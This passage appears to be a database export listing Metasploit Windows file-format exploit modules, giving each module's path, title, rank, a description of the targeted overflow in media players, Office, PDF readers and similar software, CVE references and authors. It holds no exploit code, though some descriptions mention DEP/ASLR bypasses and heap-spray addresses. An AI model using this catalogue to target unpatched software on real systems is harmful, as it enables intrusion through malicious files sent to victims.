URL-http://www.zerodayinitiative.com/advisories/ZDI-12-012","rgod, sinn3r " 644,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mediajukebox.rb","exploit","windows/fileformat/mediajukebox","exploit/windows/fileformat/mediajukebox","Media Jukebox 8.0.400 Buffer Overflow (SEH)",300,"This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.","Metasploit Framework License (BSD)","f","2009-07-01 00:00:00",0,,"aggressive","t","CVE-2009-2650, OSVDB-55924","Ron Henry , dijital1" 645,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/microp_mppl.rb","exploit","windows/fileformat/microp_mppl","exploit/windows/fileformat/microp_mppl","MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",500,"This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFileName parameter of a CreateFileA() function, and results arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-08-23 00:00:00",0,,"aggressive","t","EDB-14720, OSVDB-73627","James Fitts " 646,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/millenium_mp3_pls.rb","exploit","windows/fileformat/millenium_mp3_pls","exploit/windows/fileformat/millenium_mp3_pls","Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2009-07-30 00:00:00",0,,"aggressive","t","EDB-10240, EDB-9618, OSVDB-56574","Molotov, dookie, jduck " 647,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb","exploit","windows/fileformat/mini_stream_pls_bof","exploit/windows/fileformat/mini_stream_pls_bof","Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.","Metasploit Framework License (BSD)","f","2010-07-16 00:00:00",0,,"aggressive","t","BID-34514, EDB-14373","James Fitts , Madjix, Tiago Henriques" 648,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb","exploit","windows/fileformat/mjm_coreplayer2011_s3m","exploit/windows/fileformat/mjm_coreplayer2011_s3m","MJM Core Player 2011 .s3m Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in MJM Core Player 2011 When opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-30 00:00:00",0,,"aggressive","t","OSVDB-72101, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004","corelanc0d3r , rick2600" 649,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb","exploit","windows/fileformat/mjm_quickplayer_s3m","exploit/windows/fileformat/mjm_quickplayer_s3m","MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-30 00:00:00",0,,"aggressive","t","OSVDB-72102, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003","corelanc0d3r , rick2600" 650,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb","exploit","windows/fileformat/moxa_mediadbplayback","exploit/windows/fileformat/moxa_mediadbplayback","MOXA MediaDBPlayback ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-10-19 00:00:00",0,,"aggressive","t","CVE-2010-4742, OSVDB-68986, URL-http://www.moxa.com","MC " 651,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mplayer_sami_bof.rb","exploit","windows/fileformat/mplayer_sami_bof","exploit/windows/fileformat/mplayer_sami_bof","MPlayer SAMI Subtitle File Buffer Overflow",300,"This module exploits a stack-based buffer overflow found in the handling of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer. The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also be done from the console with the mplayer ""-sub"" option.","Metasploit Framework License (BSD)","f","2011-05-19 00:00:00",0,,"aggressive","t","BID-49149, OSVDB-74604, URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf","Jacques Louw, juan vazquez " 652,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb","exploit","windows/fileformat/ms09_067_excel_featheader","exploit/windows/fileformat/ms09_067_excel_featheader","Microsoft Excel Malformed FEATHEADER Record Vulnerability",400,"This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.","Metasploit Framework License (BSD)","f","2009-11-10 00:00:00",,,"aggressive","t","BID-36945, CVE-2009-3129, MSB-MS09-067, OSVDB-59860, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-083/","Sean Larsson, jduck " 653,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb","exploit","windows/fileformat/ms10_004_textbytesatom","exploit/windows/fileformat/ms10_004_textbytesatom","Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",400,"This module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.","Metasploit Framework License (BSD)","f","2010-02-09 00:00:00",,,"aggressive","t","CVE-2010-0033, MSB-MS10-004, OSVDB-62241, URL-http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-017/","SkD, Snake, jduck " 654,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb","exploit","windows/fileformat/ms10_038_excel_obj_bof","exploit/windows/fileformat/ms10_038_excel_obj_bof","MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",300,"This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the excution flow. This results aribrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-06-08 00:00:00",1,,"aggressive","t","BID-40520, CVE-2010-0822, MSB-MS10-038, OSVDB-65236, URL-http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/","Nicolas Joly, Shahin Ramezany , juan vazquez " 655,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb","exploit","windows/fileformat/ms10_087_rtf_pfragments_bof","exploit/windows/fileformat/ms10_087_rtf_pfragments_bof","Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",500,"This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.","Metasploit Framework License (BSD)","f","2010-11-09 00:00:00",0,,"aggressive","t","BID-44652, CVE-2010-3333, MSB-MS10-087, OSVDB-69085, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880","DJ Manila Ice, Vesh, CA, jduck , unknown, wushi of team509" 656,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb","exploit","windows/fileformat/ms11_006_createsizeddibsection","exploit/windows/fileformat/ms11_006_createsizeddibsection","Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the ""Thumbnails"" view.","Metasploit Framework License (BSD)","f","2010-12-15 00:00:00",0,,"aggressive","t","BID-45662, CVE-2010-3970, MSB-MS11-006, OSVDB-70263, URL-http://www.microsoft.com/technet/security/advisory/2490606.mspx, URL-http://www.powerofcommunity.net/schedule.html","Moti & Xu Hao, Yaniv Miron aka Lament of ilhack, jduck " 657,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb","exploit","windows/fileformat/ms11_021_xlb_bof","exploit/windows/fileformat/ms11_021_xlb_bof","MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",300,"This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results aribrary code execution under the context of user the user.","Metasploit Framework License (BSD)","f","2011-08-09 00:00:00",0,,"aggressive","t","CVE-2011-0105, MSB-MS11-021, OSVDB-71765, URL-http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-121/","Aniway, abysssec, juan vazquez , sinn3r " 658,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms12_005.rb","exploit","windows/fileformat/ms12_005","exploit/windows/fileformat/ms12_005","MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",600,"This module exploits a vulnerability found in Microsoft Office's ClickOnce feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This can allow attackers to trick victims into opening the malicious document, which will load up either a python or ruby payload, and finally, download and execute an executable.","Metasploit Framework License (BSD)","f","2012-01-10 00:00:00",0,,"passive","t","BID-51284, CVE-2012-0013, MSB-MS12-005, OSVDB-78207, URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/, URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146","Yorick Koster, sinn3r " 659,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb","exploit","windows/fileformat/ms12_027_mscomctl_bof","exploit/windows/fileformat/ms12_027_mscomctl_bof","MS12-027 MSCOMCTL ActiveX Buffer Overflow",200,"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses ""msgr3en.dll"", which will load after office got load, so the malicious file must be loaded through ""File / Open"" to achieve exploitation.","Metasploit Framework License (BSD)","f","2012-04-10 00:00:00",0,,"aggressive","t","BID-52911, CVE-2012-0158, MSB-MS12-027, OSVDB-81125, URL-http://abysssec.com/files/The_Arashi.pdf, URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html","Unknown, juan vazquez , sinn3r " 660,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb","exploit","windows/fileformat/ms_visual_basic_vbp","exploit/windows/fileformat/ms_visual_basic_vbp","Microsoft Visual Basic VBP Buffer Overflow",400,"This module exploits a stack oveflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-09-04 00:00:00",0,,"aggressive","t","BID-25629, CVE-2007-4776, OSVDB-36936","MC " 661,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb","exploit","windows/fileformat/msworks_wkspictureinterface","exploit/windows/fileformat/msworks_wkspictureinterface","Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution",100,"The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully.","Metasploit Framework License (BSD)","f","2008-11-28 00:00:00",0,,"aggressive","t","CVE-2008-1898, OSVDB-44458","dean " 662,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/mymp3player_m3u.rb","exploit","windows/fileformat/mymp3player_m3u","exploit/windows/fileformat/mymp3player_m3u","Steinberg MyMP3Player 3.0 Buffer Overflow",400,"This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When the application is used to open a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-03-18 00:00:00",0,,"aggressive","t","EDB-11791, OSVDB-64580","m_101, n3w7u" 663,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/netop.rb","exploit","windows/fileformat/netop","exploit/windows/fileformat/netop","NetOp Remote Control Client 9.5 Buffer Overflow",300,"This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5. When opening a .dws file containing a specially crafted string longer then 520 characters will allow an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-04-28 00:00:00",0,,"aggressive","t","EDB-17223, OSVDB-72291","Ruben Alejandro ""chap0""" 664,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb","exploit","windows/fileformat/nuance_pdf_launch_overflow","exploit/windows/fileformat/nuance_pdf_launch_overflow","Nuance PDF Reader v6.0 Launch Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.","Metasploit Framework License (BSD)","f","2010-10-08 00:00:00",0,,"aggressive","t","OSVDB-68514, URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/","corelanc0d3r , rick2600" 665,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/openoffice_ole.rb","exploit","windows/fileformat/openoffice_ole","exploit/windows/fileformat/openoffice_ole","OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",300,"This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on Microsoft Windows XP SP3. By supplying a OLE file with a malformed DocumentSummaryInformation stream, an attacker can gain control of the execution flow, which results arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2008-04-17 00:00:00",0,,"aggressive","t","BID-28819, CVE-2008-0320, EDB-5584, OSVDB-44472, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694","Marsu , juan vazquez " 666,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb","exploit","windows/fileformat/orbit_download_failed_bof","exploit/windows/fileformat/orbit_download_failed_bof","Orbit Downloader URL Unicode Conversion Overflow",300,"This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the ""File->Add Metalink..."" option.","Metasploit Framework License (BSD)","f","2008-04-03 00:00:00",0,,"aggressive","t","BID-28541, CVE-2008-1602, OSVDB-44036, URL-http://www.coresecurity.com/content/orbit-downloader","Diego Juarez, juan vazquez " 667,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/orbital_viewer_orb.rb","exploit","windows/fileformat/orbital_viewer_orb","exploit/windows/fileformat/orbital_viewer_orb","Orbital Viewer ORB File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.","Metasploit Framework License (BSD)","f","2010-02-27 00:00:00",0,,"aggressive","t","BID-38436, CVE-2010-0688, EDB-11581, OSVDB-62580, URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/","jduck " 668,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ovf_format_string.rb","exploit","windows/fileformat/ovf_format_string","exploit/windows/fileformat/ovf_format_string","VMWare OVF Tools Format String Vulnerability",300,"This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-08 00:00:00",0,,"aggressive","t","BID-56468, CVE-2012-3569, OSVDB-87117, URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html","Jeremy Brown, juan vazquez " 669,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb","exploit","windows/fileformat/proshow_cellimage_bof","exploit/windows/fileformat/proshow_cellimage_bof","ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to victim and the victim must open the file.","Metasploit Framework License (BSD)","f","2009-08-20 00:00:00",0,,"aggressive","t","CVE-2009-3214, EDB-9483, EDB-9519, OSVDB-57226","jduck " 670,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/proshow_load_bof.rb","exploit","windows/fileformat/proshow_load_bof","exploit/windows/fileformat/proshow_load_bof","Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Photodex ProShow Producer v5.0.3256 in the handling of the plugins load list file. An attacker must send the crafted ""load"" file to victim, who must store it in the installation directory. The vulnerability will be triggered the next time ProShow is opened. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2012-06-06 00:00:00",0,,"aggressive","t","EDB-19563, EDB-20036, OSVDB-83745, URL-http://security.inshell.net/advisory/30","Julien Ahrens, juan vazquez , mr.pr0n" 671,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb","exploit","windows/fileformat/real_networks_netzip_bof","exploit/windows/fileformat/real_networks_netzip_bof","Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability",400,"This module exploits a stack-based buffer overflow vulnerability in version 7.5.1 86 of Real Networks Netzip Classic. In order for the command to be executed, an attacker must convince someone to load a specially crafted zip file with NetZip Classic. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2011-01-30 00:00:00",0,,"aggressive","t","BID-46059, EDB-16083, URL-http://proforma.real.com","C4SS!0 G0M3S, TecR0c " 672,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/real_player_url_property_bof.rb","exploit","windows/fileformat/real_player_url_property_bof","exploit/windows/fileformat/real_player_url_property_bof","RealPlayer RealMedia File Handling Buffer Overflow",300,"This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.","Metasploit Framework License (BSD)","f","2012-12-14 00:00:00",0,,"aggressive","t","BID-56956, CVE-2012-5691, OSVDB-88486, URL-http://service.real.com/realplayer/security/12142012_player/en/","suto " 673,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb","exploit","windows/fileformat/safenet_softremote_groupname","exploit/windows/fileformat/safenet_softremote_groupname","SafeNet SoftRemote GROUPNAME Buffer Overflow",400,"This module exploits a stack buffer overflow in SafeNet SoftRemote Security Policy Editor <= 10.8.5. When an attacker creates a specially formatted security policy with an overly long GROUPNAME argument, it is possible to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-30 00:00:00",0,,"aggressive","t","CVE-2009-3861, OSVDB-59660, URL-http://www.senseofsecurity.com.au/advisories/SOS-09-008","MC " 674,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/sascam_get.rb","exploit","windows/fileformat/sascam_get","exploit/windows/fileformat/sascam_get","SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow",100,"The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. This control is not marked safe for scripting, please choose your attack vector carefully.","Metasploit Framework License (BSD)","f","2008-12-29 00:00:00",0,,"aggressive","t","BID-33053, CVE-2008-6898, OSVDB-55945","dean " 675,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/scadaphone_zip.rb","exploit","windows/fileformat/scadaphone_zip","exploit/windows/fileformat/scadaphone_zip","ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow vulnerability in version 5.3.11.1230 of scadaTEC's ScadaPhone. In order for the command to be executed, an attacker must convince someone to load a specially crafted project zip file with ScadaPhone. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","CVE-2011-4535, EDB-17817, OSVDB-75375, URL-http://www.scadatec.com/","mr_me " 676,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb","exploit","windows/fileformat/shadow_stream_recorder_bof","exploit/windows/fileformat/shadow_stream_recorder_bof","Shadow Stream Recorder 3.0.1.7 Buffer Overflow",300,"This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7. Using the application to open a specially crafted asx file, a buffer overflow may occur to allow arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","BID-34864, EDB-11957","AlpHaNiX , b0telh0 " 677,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/somplplayer_m3u.rb","exploit","windows/fileformat/somplplayer_m3u","exploit/windows/fileformat/somplplayer_m3u","S.O.M.P.L 1.0 Player Buffer Overflow",500,"This module exploits a buffer overflow in Simple Open Music Player v1.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-01-22 00:00:00",0,,"aggressive","t","EDB-11219, OSVDB-64368","Rick2600, dookie" 678,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb","exploit","windows/fileformat/subtitle_processor_m3u_bof","exploit/windows/fileformat/subtitle_processor_m3u_bof","Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow",300,"This module exploits a vulnerability found in Subtitle Processor 7. By supplying a long string of data as a .m3u file, Subtitle Processor first converts this input in Unicode, which expands the string size, and then attempts to copy it inline on the stack. This results a buffer overflow with SEH overwritten, allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-04-26 00:00:00",0,,"aggressive","t","EDB-17217, URL-http://sourceforge.net/projects/subtitleproc/","Brandon Murphy, sinn3r " 679,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb","exploit","windows/fileformat/tfm_mmplayer_m3u_ppl_bof","exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof","TFM MMPlayer (m3u/ppl File) Buffer Overflow",400,"This module exploits a buffer overflow in MMPlayer 2.2 The vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string, which results in overwriting a SEH record, thus allowing arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-23 00:00:00",0,,"aggressive","t","BID-52698, EDB-18656, EDB-18657, OSVDB-80532","Brendan Coles , RjRjh Hack3r" 680,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/tugzip.rb","exploit","windows/fileformat/tugzip","exploit/windows/fileformat/tugzip","TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",400,"This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2008-10-28 00:00:00",0,,"aggressive","t","BID-31913, CVE-2008-4779, EDB-12008, OSVDB-49371","Lincoln, Stefan Marin, TecR0c , mr_me " 681,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ultraiso_ccd.rb","exploit","windows/fileformat/ultraiso_ccd","exploit/windows/fileformat/ultraiso_ccd","UltraISO CCD File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CCD files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CCD file. NOTE: A file with the same base name, but the extension of ""img"" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.","Metasploit Framework License (BSD)","f","2009-04-03 00:00:00",0,,"aggressive","t","BID-34363, BID-38613, CVE-2009-1260, EDB-8343, OSVDB-53275","jduck " 682,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ultraiso_cue.rb","exploit","windows/fileformat/ultraiso_cue","exploit/windows/fileformat/ultraiso_cue","UltraISO CUE File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of ""bin"" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.","Metasploit Framework License (BSD)","f","2007-05-24 00:00:00",0,,"aggressive","t","BID-24140, CVE-2007-2888, EDB-3978, OSVDB-36570","jduck , n00b" 683,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ursoft_w32dasm.rb","exploit","windows/fileformat/ursoft_w32dasm","exploit/windows/fileformat/ursoft_w32dasm","URSoft W32Dasm Disassembler Function Buffer Overflow",400,"This module exploits a buffer overflow in W32Dasm <= v8.93. By creating a malicious file and convincing a user to disassemble the file with a vulnerable version of W32Dasm, the Imports/Exports function is copied to the stack and arbitrary code may be executed locally as the user.","Metasploit Framework License (BSD)","f","2005-01-24 00:00:00",0,,"aggressive","t","BID-12352, CVE-2005-0308, OSVDB-13169, URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt","patrick " 684,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/varicad_dwb.rb","exploit","windows/fileformat/varicad_dwb","exploit/windows/fileformat/varicad_dwb","VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN. An attacker must send the file to victim and the victim must open the file.","Metasploit Framework License 